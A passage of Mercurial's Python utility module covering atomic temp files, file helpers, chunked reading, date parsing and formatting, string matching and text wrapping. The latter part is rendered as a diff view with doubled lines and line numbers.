                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
1660
1657
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # 'w' mode means the caller will truncate anyway, so skip copying
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # commit: flush the temp copy and rename it over the target
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # only stat the old file when ambiguity checking is requested
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # abort: drop the temp copy without touching the target
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception escaped the block
        if exctype is not None:
            self.discard()
        else:
            self.close()
1723
1720
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty

    If ignoremissing is True, a missing file is not an error.
    Pruning of now-empty parent directories is best-effort.
    """
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1735
1732
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        # only a missing file is tolerated; other failures propagate
        if e.errno != errno.ENOENT:
            raise
1743
1740
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already present: nothing to create (mode is NOT re-applied)
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent is missing: create it first, then retry this level
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached filesystem root without success
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
1771
1768
def readfile(path):
    """Return the entire binary content of ``path``."""
    with open(path, 'rb') as fp:
        return fp.read()
1775
1772
def writefile(path, text):
    """Overwrite ``path`` with the bytes in ``text``."""
    with open(path, 'wb') as fp:
        fp.write(text)
1779
1776
def appendfile(path, text):
    """Append the bytes in ``text`` to ``path``, creating it if needed."""
    with open(path, 'ab') as fp:
        fp.write(text)
1783
1780
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def _capped(chunks):
            # re-slice anything above 1MB into 256KB pieces so one huge
            # input chunk never has to be shuffled around wholesale
            for piece in chunks:
                if len(piece) > 2**20:
                    start = 0
                    while start < len(piece):
                        stop = start + 2 ** 18
                        yield piece[start:stop]
                        start = stop
                else:
                    yield piece
        self.iter = _capped(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        remaining = l
        pieces = []
        pending = self._queue
        while remaining > 0:
            # top up the queue with roughly 256KB of buffered chunks
            if not pending:
                budget = 2**18
                for piece in self.iter:
                    pending.append(piece)
                    budget -= len(piece)
                    if budget <= 0:
                        break
                if not pending:
                    break

            # Peek at the head instead of popleft()/appendleft(): for a
            # partial read this saves a second deque mutation and a
            # throwaway substring for the unread remainder.
            head = pending[0]
            headlen = len(head)
            off = self._chunkoffset

            # the whole chunk fits in the request
            if off == 0 and remaining >= headlen:
                remaining -= headlen
                pending.popleft()
                pieces.append(head)
                # self._chunkoffset stays at 0
                continue

            avail = headlen - off

            # the entire unconsumed tail of the chunk is needed
            if remaining >= avail:
                remaining -= avail
                pending.popleft()
                # off == 0 was handled above, so this never degenerates
                # into a full copy via ``head[0:]``
                pieces.append(head[off:])
                self._chunkoffset = 0

            # only part of the chunk is needed
            else:
                pieces.append(head[off:off + remaining])
                self._chunkoffset += remaining
                remaining -= avail

        return ''.join(pieces)
1863
1860
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero byte budget short-circuits without touching the file
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
1884
1881
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # local-vs-UTC skew for this instant gives the timezone offset
    skew = (datetime.datetime.utcfromtimestamp(timestamp) -
            datetime.datetime.fromtimestamp(timestamp))
    return timestamp, skew.days * 86400 + skew.seconds
1897
1894
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the %z/%1/%2 extensions into a +HHMM style offset
        sign = "-" if tz > 0 else "+"
        q, r = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    # clamp to the signed 32-bit range that strftime handles portably
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1933
1930
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into iso 8631 date."""
    # delegate to datestr with a fixed ISO-style year-month-day format
    return datestr(date, format='%Y-%m-%d')
1937
1934
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
            s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    return None, s
1965
1962
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # fill in any element the string leaves unspecified, walking from the
    # most specific field (seconds) up to the least specific (years)
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"):
        part = pycompat.bytestr(part)
        if not any(("%" + p) in format for p in part):
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # a specific time element was given; less specific elements
            # are interpreted relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # no explicit zone: derive the offset from the local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
1998
1995
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
                                               datetime.timedelta(days=1)\
                                              ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate('now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic names, both the English form and its translation
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime('%b %d')
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime('%b %d')

    try:
        # fast path: a raw "unixtime offset" pair
        when, offset = map(int, date.split(' '))
    except ValueError:
        # build per-field defaults: biased values for fields more specific
        # than anything given, today's values for the rest
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                b = "00" if part[0:1] in "HMS" else "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each known format until one parses
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2075
2072
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate("10:29:59")
    >>> p2 = parsedate("10:30:00")
    >>> p3 = parsedate("10:30:59")
    >>> p4 = parsedate("10:31:00")
    >>> p5 = parsedate("Sep 15 10:30:00 1999")
    >>> f = matchdate("10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lowerbound(spec):
        # earliest instant the spec can denote (unknown fields minimized)
        return parsedate(spec, extendeddateformats,
                         {'mb': "1", 'd': "1"})[0]

    def upperbound(spec):
        # latest instant the spec can denote (unknown fields maximized);
        # try the longest plausible month lengths first
        fill = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                fill["d"] = days
                return parsedate(spec, extendeddateformats, fill)[0]
            except Abort:
                pass
        fill["d"] = "28"
        return parsedate(spec, extendeddateformats, fill)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upperbound(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lowerbound(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        a, b = date.split(" to ")
        start, stop = lowerbound(a), upperbound(b)
        return lambda x: x >= start and x <= stop
    else:
        start, stop = lowerbound(date), upperbound(date)
        return lambda x: x >= start and x <= stop
2151
2148
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test('abcdefg', 'abc', 'def', 'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test('literal:re:foobar', 'foobar', 're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0 if casesensitive else remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    # anything else is a literal; strip the explicit prefix if present
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2210
2207
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop everything from the '@' on, then take what follows a '<'
    i = user.find('@')
    if i >= 0:
        user = user[:i]
    i = user.find('<')
    if i >= 0:
        user = user[i + 1:]
    # finally truncate at the first space or dot, in that order
    for sep in (' ', '.'):
        i = user.find(sep)
        if i >= 0:
            user = user[:i]
    return user
2226
2223
def emailuser(user):
    """Return the user portion of an email address."""
    # strip the domain, then anything preceding and including a '<'
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    return user
2236
2233
def email(author):
    '''get email of author.'''
    # slice between '<' and '>'; with no '<', find returns -1 so the
    # slice starts at 0, and with no '>' it runs to the end of the string
    close = author.find('>')
    return author[author.find('<') + 1:close if close != -1 else None]
2243
2240
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # encoding.trim is column-aware (wide characters count as two)
    return encoding.trim(text, maxlength, ellipsis='...')
2247
2244
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        # pick the first unit whose threshold the magnitude reaches
        for scale, unit, fmt in unittable:
            if abs(count) >= unit * scale:
                return fmt % (count / float(unit))
        # smaller than every threshold: fall back to the last (finest) entry
        return unittable[-1][2] % count

    return render
2258
2255
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # callers want a half-open, 0-based interval
    return fromline - 1, toline
2279
2276
2280 bytecount = unitcountfn(
2277 bytecount = unitcountfn(
2281 (100, 1 << 30, _('%.0f GB')),
2278 (100, 1 << 30, _('%.0f GB')),
2282 (10, 1 << 30, _('%.1f GB')),
2279 (10, 1 << 30, _('%.1f GB')),
2283 (1, 1 << 30, _('%.2f GB')),
2280 (1, 1 << 30, _('%.2f GB')),
2284 (100, 1 << 20, _('%.0f MB')),
2281 (100, 1 << 20, _('%.0f MB')),
2285 (10, 1 << 20, _('%.1f MB')),
2282 (10, 1 << 20, _('%.1f MB')),
2286 (1, 1 << 20, _('%.2f MB')),
2283 (1, 1 << 20, _('%.2f MB')),
2287 (100, 1 << 10, _('%.0f KB')),
2284 (100, 1 << 10, _('%.0f KB')),
2288 (10, 1 << 10, _('%.1f KB')),
2285 (10, 1 << 10, _('%.1f KB')),
2289 (1, 1 << 10, _('%.2f KB')),
2286 (1, 1 << 10, _('%.2f KB')),
2290 (1, 1, _('%.0f bytes')),
2287 (1, 1, _('%.0f bytes')),
2291 )
2288 )
2292
2289
2293 # Matches a single EOL which can either be a CRLF where repeated CR
2290 # Matches a single EOL which can either be a CRLF where repeated CR
2294 # are removed or a LF. We do not care about old Macintosh files, so a
2291 # are removed or a LF. We do not care about old Macintosh files, so a
2295 # stray CR is an error.
2292 # stray CR is an error.
2296 _eolre = remod.compile(br'\r*\n')
2293 _eolre = remod.compile(br'\r*\n')
2297
2294
2298 def tolf(s):
2295 def tolf(s):
2299 return _eolre.sub('\n', s)
2296 return _eolre.sub('\n', s)
2300
2297
2301 def tocrlf(s):
2298 def tocrlf(s):
2302 return _eolre.sub('\r\n', s)
2299 return _eolre.sub('\r\n', s)
2303
2300
2304 if pycompat.oslinesep == '\r\n':
2301 if pycompat.oslinesep == '\r\n':
2305 tonativeeol = tocrlf
2302 tonativeeol = tocrlf
2306 fromnativeeol = tolf
2303 fromnativeeol = tolf
2307 else:
2304 else:
2308 tonativeeol = pycompat.identity
2305 tonativeeol = pycompat.identity
2309 fromnativeeol = pycompat.identity
2306 fromnativeeol = pycompat.identity
2310
2307
2311 def escapestr(s):
2308 def escapestr(s):
2312 # call underlying function of s.encode('string_escape') directly for
2309 # call underlying function of s.encode('string_escape') directly for
2313 # Python 3 compatibility
2310 # Python 3 compatibility
2314 return codecs.escape_encode(s)[0]
2311 return codecs.escape_encode(s)[0]
2315
2312
2316 def unescapestr(s):
2313 def unescapestr(s):
2317 return codecs.escape_decode(s)[0]
2314 return codecs.escape_decode(s)[0]
2318
2315
2319 def forcebytestr(obj):
2316 def forcebytestr(obj):
2320 """Portably format an arbitrary object (e.g. exception) into a byte
2317 """Portably format an arbitrary object (e.g. exception) into a byte
2321 string."""
2318 string."""
2322 try:
2319 try:
2323 return pycompat.bytestr(obj)
2320 return pycompat.bytestr(obj)
2324 except UnicodeEncodeError:
2321 except UnicodeEncodeError:
2325 # non-ascii string, may be lossy
2322 # non-ascii string, may be lossy
2326 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2323 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2327
2324
2328 def uirepr(s):
2325 def uirepr(s):
2329 # Avoid double backslash in Windows path repr()
2326 # Avoid double backslash in Windows path repr()
2330 return repr(s).replace('\\\\', '\\')
2327 return repr(s).replace('\\\\', '\\')
2331
2328
2332 # delay import of textwrap
2329 # delay import of textwrap
2333 def MBTextWrapper(**kwargs):
2330 def MBTextWrapper(**kwargs):
2334 class tw(textwrap.TextWrapper):
2331 class tw(textwrap.TextWrapper):
2335 """
2332 """
2336 Extend TextWrapper for width-awareness.
2333 Extend TextWrapper for width-awareness.
2337
2334
2338 Neither number of 'bytes' in any encoding nor 'characters' is
2335 Neither number of 'bytes' in any encoding nor 'characters' is
2339 appropriate to calculate terminal columns for specified string.
2336 appropriate to calculate terminal columns for specified string.
2340
2337
2341 Original TextWrapper implementation uses built-in 'len()' directly,
2338 Original TextWrapper implementation uses built-in 'len()' directly,
2342 so overriding is needed to use width information of each characters.
2339 so overriding is needed to use width information of each characters.
2343
2340
2344 In addition, characters classified into 'ambiguous' width are
2341 In addition, characters classified into 'ambiguous' width are
2345 treated as wide in East Asian area, but as narrow in other.
2342 treated as wide in East Asian area, but as narrow in other.
2346
2343
2347 This requires use decision to determine width of such characters.
2344 This requires use decision to determine width of such characters.
2348 """
2345 """
2349 def _cutdown(self, ucstr, space_left):
2346 def _cutdown(self, ucstr, space_left):
2350 l = 0
2347 l = 0
2351 colwidth = encoding.ucolwidth
2348 colwidth = encoding.ucolwidth
2352 for i in xrange(len(ucstr)):
2349 for i in xrange(len(ucstr)):
2353 l += colwidth(ucstr[i])
2350 l += colwidth(ucstr[i])
2354 if space_left < l:
2351 if space_left < l:
2355 return (ucstr[:i], ucstr[i:])
2352 return (ucstr[:i], ucstr[i:])
2356 return ucstr, ''
2353 return ucstr, ''
2357
2354
2358 # overriding of base class
2355 # overriding of base class
2359 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2356 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2360 space_left = max(width - cur_len, 1)
2357 space_left = max(width - cur_len, 1)
2361
2358
2362 if self.break_long_words:
2359 if self.break_long_words:
2363 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2360 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2364 cur_line.append(cut)
2361 cur_line.append(cut)
2365 reversed_chunks[-1] = res
2362 reversed_chunks[-1] = res
2366 elif not cur_line:
2363 elif not cur_line:
2367 cur_line.append(reversed_chunks.pop())
2364 cur_line.append(reversed_chunks.pop())
2368
2365
2369 # this overriding code is imported from TextWrapper of Python 2.6
2366 # this overriding code is imported from TextWrapper of Python 2.6
2370 # to calculate columns of string by 'encoding.ucolwidth()'
2367 # to calculate columns of string by 'encoding.ucolwidth()'
2371 def _wrap_chunks(self, chunks):
2368 def _wrap_chunks(self, chunks):
2372 colwidth = encoding.ucolwidth
2369 colwidth = encoding.ucolwidth
2373
2370
2374 lines = []
2371 lines = []
2375 if self.width <= 0:
2372 if self.width <= 0:
2376 raise ValueError("invalid width %r (must be > 0)" % self.width)
2373 raise ValueError("invalid width %r (must be > 0)" % self.width)
2377
2374
2378 # Arrange in reverse order so items can be efficiently popped
2375 # Arrange in reverse order so items can be efficiently popped
2379 # from a stack of chucks.
2376 # from a stack of chucks.
2380 chunks.reverse()
2377 chunks.reverse()
2381
2378
2382 while chunks:
2379 while chunks:
2383
2380
2384 # Start the list of chunks that will make up the current line.
2381 # Start the list of chunks that will make up the current line.
2385 # cur_len is just the length of all the chunks in cur_line.
2382 # cur_len is just the length of all the chunks in cur_line.
2386 cur_line = []
2383 cur_line = []
2387 cur_len = 0
2384 cur_len = 0
2388
2385
2389 # Figure out which static string will prefix this line.
2386 # Figure out which static string will prefix this line.
2390 if lines:
2387 if lines:
2391 indent = self.subsequent_indent
2388 indent = self.subsequent_indent
2392 else:
2389 else:
2393 indent = self.initial_indent
2390 indent = self.initial_indent
2394
2391
2395 # Maximum width for this line.
2392 # Maximum width for this line.
2396 width = self.width - len(indent)
2393 width = self.width - len(indent)
2397
2394
2398 # First chunk on line is whitespace -- drop it, unless this
2395 # First chunk on line is whitespace -- drop it, unless this
2399 # is the very beginning of the text (i.e. no lines started yet).
2396 # is the very beginning of the text (i.e. no lines started yet).
2400 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2397 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2401 del chunks[-1]
2398 del chunks[-1]
2402
2399
2403 while chunks:
2400 while chunks:
2404 l = colwidth(chunks[-1])
2401 l = colwidth(chunks[-1])
2405
2402
2406 # Can at least squeeze this chunk onto the current line.
2403 # Can at least squeeze this chunk onto the current line.
2407 if cur_len + l <= width:
2404 if cur_len + l <= width:
2408 cur_line.append(chunks.pop())
2405 cur_line.append(chunks.pop())
2409 cur_len += l
2406 cur_len += l
2410
2407
2411 # Nope, this line is full.
2408 # Nope, this line is full.
2412 else:
2409 else:
2413 break
2410 break
2414
2411
2415 # The current line is full, and the next chunk is too big to
2412 # The current line is full, and the next chunk is too big to
2416 # fit on *any* line (not just this one).
2413 # fit on *any* line (not just this one).
2417 if chunks and colwidth(chunks[-1]) > width:
2414 if chunks and colwidth(chunks[-1]) > width:
2418 self._handle_long_word(chunks, cur_line, cur_len, width)
2415 self._handle_long_word(chunks, cur_line, cur_len, width)
2419
2416
2420 # If the last chunk on this line is all whitespace, drop it.
2417 # If the last chunk on this line is all whitespace, drop it.
2421 if (self.drop_whitespace and
2418 if (self.drop_whitespace and
2422 cur_line and cur_line[-1].strip() == r''):
2419 cur_line and cur_line[-1].strip() == r''):
2423 del cur_line[-1]
2420 del cur_line[-1]
2424
2421
2425 # Convert current line back to a string and store it in list
2422 # Convert current line back to a string and store it in list
2426 # of all lines (return value).
2423 # of all lines (return value).
2427 if cur_line:
2424 if cur_line:
2428 lines.append(indent + r''.join(cur_line))
2425 lines.append(indent + r''.join(cur_line))
2429
2426
2430 return lines
2427 return lines
2431
2428
2432 global MBTextWrapper
2429 global MBTextWrapper
2433 MBTextWrapper = tw
2430 MBTextWrapper = tw
2434 return tw(**kwargs)
2431 return tw(**kwargs)
2435
2432
2436 def wrap(line, width, initindent='', hangindent=''):
2433 def wrap(line, width, initindent='', hangindent=''):
2437 maxindent = max(len(hangindent), len(initindent))
2434 maxindent = max(len(hangindent), len(initindent))
2438 if width <= maxindent:
2435 if width <= maxindent:
2439 # adjust for weird terminal size
2436 # adjust for weird terminal size
2440 width = max(78, maxindent + 1)
2437 width = max(78, maxindent + 1)
2441 line = line.decode(pycompat.sysstr(encoding.encoding),
2438 line = line.decode(pycompat.sysstr(encoding.encoding),
2442 pycompat.sysstr(encoding.encodingmode))
2439 pycompat.sysstr(encoding.encodingmode))
2443 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2440 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2444 pycompat.sysstr(encoding.encodingmode))
2441 pycompat.sysstr(encoding.encodingmode))
2445 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2442 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2446 pycompat.sysstr(encoding.encodingmode))
2443 pycompat.sysstr(encoding.encodingmode))
2447 wrapper = MBTextWrapper(width=width,
2444 wrapper = MBTextWrapper(width=width,
2448 initial_indent=initindent,
2445 initial_indent=initindent,
2449 subsequent_indent=hangindent)
2446 subsequent_indent=hangindent)
2450 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2447 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2451
2448
2452 if (pyplatform.python_implementation() == 'CPython' and
2449 if (pyplatform.python_implementation() == 'CPython' and
2453 sys.version_info < (3, 0)):
2450 sys.version_info < (3, 0)):
2454 # There is an issue in CPython that some IO methods do not handle EINTR
2451 # There is an issue in CPython that some IO methods do not handle EINTR
2455 # correctly. The following table shows what CPython version (and functions)
2452 # correctly. The following table shows what CPython version (and functions)
2456 # are affected (buggy: has the EINTR bug, okay: otherwise):
2453 # are affected (buggy: has the EINTR bug, okay: otherwise):
2457 #
2454 #
2458 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2455 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2459 # --------------------------------------------------
2456 # --------------------------------------------------
2460 # fp.__iter__ | buggy | buggy | okay
2457 # fp.__iter__ | buggy | buggy | okay
2461 # fp.read* | buggy | okay [1] | okay
2458 # fp.read* | buggy | okay [1] | okay
2462 #
2459 #
2463 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2460 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2464 #
2461 #
2465 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2462 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2466 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2463 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2467 #
2464 #
2468 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2465 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2469 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2466 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2470 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2467 # CPython 2, because CPython 2 maintains an internal readahead buffer for
